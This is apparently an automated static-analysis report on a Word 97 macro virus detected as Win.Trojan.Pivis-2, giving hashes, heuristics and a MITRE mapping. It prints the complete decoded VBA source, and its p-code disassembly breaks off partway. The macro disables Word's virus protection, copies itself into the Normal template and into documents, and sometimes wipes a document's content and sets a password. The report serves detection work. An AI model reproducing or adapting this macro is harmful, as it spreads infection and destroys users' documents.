Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 d69452451573eab5…

MALICIOUS

Office (OLE)

34.5 KB Created: 2000-08-14 09:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: bafff52d89de041f678943224c14f642 SHA-1: 36b002bed06fb85aea3def56ac2ed66b204fe9bc SHA-256: d69452451573eab5fff8673720ec8b45ad4ef66bbc9a747cd3e87d1793f5cd31
120 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection name 'Win.Trojan.Pivis-2' strongly suggests a trojan payload. The macro code attempts to copy itself to other documents, indicating a self-propagation or infection mechanism.

Heuristics 3

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5954 bytes
SHA-256: a7028948b9b6a5771b009881166a8a0cad8cb66f2810434d2b190a1677f40260
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Randomize Timer
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap
viruscode = Activecl.lines(1, Activecl.countoflines)
Normalcl.insertlines 1, viruscode
InfecteerDeHap:
If Activecl.countoflines > 0 Then GoTo Doeii
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument
Doeii:
x = Int(Rnd * 100)
If x = 11 Then MsgBox "w97.LAM€ by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..."
If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje"
With ActiveDocument.VBProject.VBComponents.Item(1).codemodule
.ReplaceLine 39, "Sub ToolsMacro()"
.ReplaceLine 40, "'(c) LiFEwiRE 2000"
.ReplaceLine 42, "Sub ViewVBCode()"
.ReplaceLine 43, "'www.coderz.net - www.shadowvx.org"
End With
'(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r
't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r!
End Sub

Private Sub Document_new()
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.Saved = True
End Sub

' Processing file: /opt/analyzer/scan_staging/261bab45269a43358b58e88ab8ee3fdf.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3489 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld Timer 
' 	ArgsCall Read 0x0001 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set Normalcl 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set Activecl 
' Line #8:
' 	Ld Normalcl 
' 	MemLd countoflines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	GoTo InfecteerDeHap 
' 	EndIf 
' Line #9:
' 	LitDI2 0x0001 
' 	Ld Activecl 
' 	MemLd countoflines 
' 	Ld Activecl 
' 	ArgsMemLd lines 0x0002 
' 	St viruscode 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld viruscode 
' 	Ld Normalcl 
' 	ArgsMemCall insertlines 0x0002 
' Line #11:
' 	Label InfecteerDeHap 
' Line #12:
' 	Ld Activecl 
' 	MemLd countoflines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	GoTo Doeii 
' 	EndIf 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld Normalcl 
' 	MemLd countoflines 
' 	Ld Normalcl 
' 	ArgsMemLd lines 0x0002 
' 	St viruscode 
' Line #14:
' 	LitDI2 0x0001 
' 	Ld viruscode 
' 	Ld Activecl 
' 	ArgsMemCall insertlines 0x0002 
' Line #15:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed FileName 
' 	Ld wdDocument 
' 	ParamNamed Fileformat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' Line #16:
' 	Label Doeii 
' Line #17:
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	St x 
' Line #18:
' 	Ld x 
' 	LitDI2 0x000B 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0027 "w97.LAM€ by LiFEwiRE [www.shadowvx.org]"
' 	ParamOmitted 
' 	LitStr 0x0012 "...::LiFEwiRE::..."
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #19:
' 	Ld x 
' 	LitDI2 0x0019 
' 	
... (truncated)